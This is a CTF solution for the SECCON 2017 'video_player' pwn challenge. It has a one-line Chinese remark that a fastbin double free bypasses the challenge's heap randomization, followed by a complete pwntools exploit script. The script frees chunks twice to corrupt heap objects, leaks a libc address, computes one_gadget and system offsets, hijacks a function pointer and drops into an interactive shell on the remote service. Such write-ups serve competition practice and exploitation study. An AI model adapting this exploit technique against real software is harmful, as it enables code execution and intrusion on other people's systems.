Seccon2017-pwn500-video_player
感觉这个题目并不值500分,有些地方比较牵强,漏洞也比较明显,解题方法有多种,出题者把堆的布局随机化了,不过使用fastbin doublefree的话,可以完全忽视被打乱的堆。
1 from pwn import * 2 #context.log_level='debug' 3 #wah 4 def newaudioclip(r, bitrate, length, data, description): 5 r.recvuntil('>>> ') 6 r.sendline('1') 7 r.recvuntil('>>> ') 8 r.sendline('2') 9 r.recvuntil('Audio Bitrate : ') 10 r.send(bitrate) 11 r.recvuntil('Audio Length (seconds) : ') 12 r.send(length) 13 r.recvuntil('Audio Data : ') 14 r.send(data) 15 r.recvuntil('Add description : ') 16 r.send(description) 17 18 def newvideoclip(r, rs, fps, num, data, description): 19 r.recvuntil('>>> ') 20 r.sendline('1') 21 r.recvuntil('>>> ') 22 r.sendline('1') 23 r.recvuntil('Video Resolution : ') 24 r.send(rs) 25 r.recvuntil('FPS : ') 26 r.send(fps) 27 r.recvuntil('Number of Frames : ') 28 r.send(num) 29 r.recvuntil('Video Data : ') 30 r.send(data) 31 r.recvuntil('Add description : ') 32 r.send(description) 33 34 def newmetadataclip(r, date, owner): 35 r.recvuntil('>>> ') 36 r.sendline('1') 37 r.recvuntil('>>> ') 38 r.sendline('4') 39 r.recvuntil('Date of Creation : ') 40 r.send(date) 41 r.recvuntil('Owner of video : ') 42 r.send(owner) 43 44 45 def editvideoclip(r, inx, rs, fps, num, data, description): 46 r.recvuntil('>>> ') 47 r.sendline('2') 48 r.recvuntil('Enter index : ') 49 r.sendline(inx) 50 r.recvuntil('Video Resolution : ') 51 r.send(rs) 52 r.recvuntil('FPS : ') 53 r.send(fps) 54 r.recvuntil('Number of Frames : ') 55 r.send(num) 56 r.recvuntil('Video Data : ') 57 r.send(data) 58 r.recvuntil('Edit description : ') 59 r.send(description) 60 61 def delclip(r, inx): 62 r.recvuntil('>>> ') 63 r.sendline('4') 64 r.recvuntil('Enter index : ') 65 r.sendline(inx) 66 67 close = 0 68 def playvideoclip(r, inx): 69 global close 70 r.recvuntil('>>> ') 71 r.sendline('3') 72 r.recvuntil('Enter index : ') 73 r.sendline(inx) 74 r.recvuntil('Playing video...\n') 75 tmp8 = r.recv(8) 76 final8 = '' 77 for i in range(0, 8): 78 final8 += chr(ord(tmp8[i])^0xcc) 79 close = u64(final8) 80 print('leaked close is %x'%close) 81 82 chunk = 0 83 def playvideoclip1(r, inx): 84 global chunk 85 r.recvuntil('>>> ') 86 r.sendline('3') 87 r.recvuntil('Enter index : ') 88 r.sendline(inx) 89 r.recvuntil('Playing video...\n') 90 tmp8 = r.recv(8) 91 final8 = '' 92 for i in range(0, 8): 93 final8 += chr(ord(tmp8[i])^0xcc) 94 chunk = u64(final8) 95 print('leaked chunk is %x'%chunk) 96 97 def playvideoclip2(r, inx): 98 r.recvuntil('>>> ') 99 r.sendline('3') 100 r.recvuntil('Enter index : ') 101 r.sendline(inx) 102 103 if 0: 104 ip = '127.0.0.1' 105 port = 10001 106 else: 107 ip = 'video_player.pwn.seccon.jp' 108 port = 7777 109 110 def getpid(): 111 import time 112 exe = 'video_player' 113 time.sleep(0.1) 114 pid= pwnlib.util.proc.pidof(exe) 115 print pid 116 raw_input('go!') 117 118 def pwnpwn(): 119 r = remote(ip, port) 120 r.recvuntil('What is your movie name?') 121 getpid() 122 r.send('\x00'*0xff) 123 #newaudioclip(r, bitrate, length, data, description): 124 newaudioclip(r, p16(30), p32(0x50), '\x00', '\x00') 125 #1 126 newvideoclip(r, p64(0), p32(0), p32(0x30), '\x00', '\x00') 127 editvideoclip(r, '1', p64(0), p32(0), p32(0x50), '\x00', '\x00') 128 129 delclip(r, '0') 130 delclip(r, '1') 131 132 #2 133 newvideoclip(r, p64(0), p32(0), p32(0x50), '\x00', '\x00') 134 135 data = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x00604028) 136 editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data, '\x00') 137 playvideoclip(r, '2') 138 139 #3 140 close_offset = 0xF78B0 141 binsh_offset = 0x18CD17 142 system_offset = 0x45390 143 one_gadget_offset = 0xf1117 144 binsh = close - close_offset + binsh_offset 145 system = close - close_offset + system_offset 146 one_gadget = close - close_offset + one_gadget_offset 147 data1 = p64(0)*2+p64(one_gadget) 148 newmetadataclip(r, data1, '\x00'*0x1f) 149 150 data2 = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x0000000000604400+3*8) 151 editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data2, '\x00') 152 playvideoclip1(r, '2') 153 154 raw_input('here') 155 data3 = p64(chunk) 156 editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data3, 'b'*0x2f) 157 playvideoclip2(r, '2') 158 r.interactive() 159 160 pwnpwn()
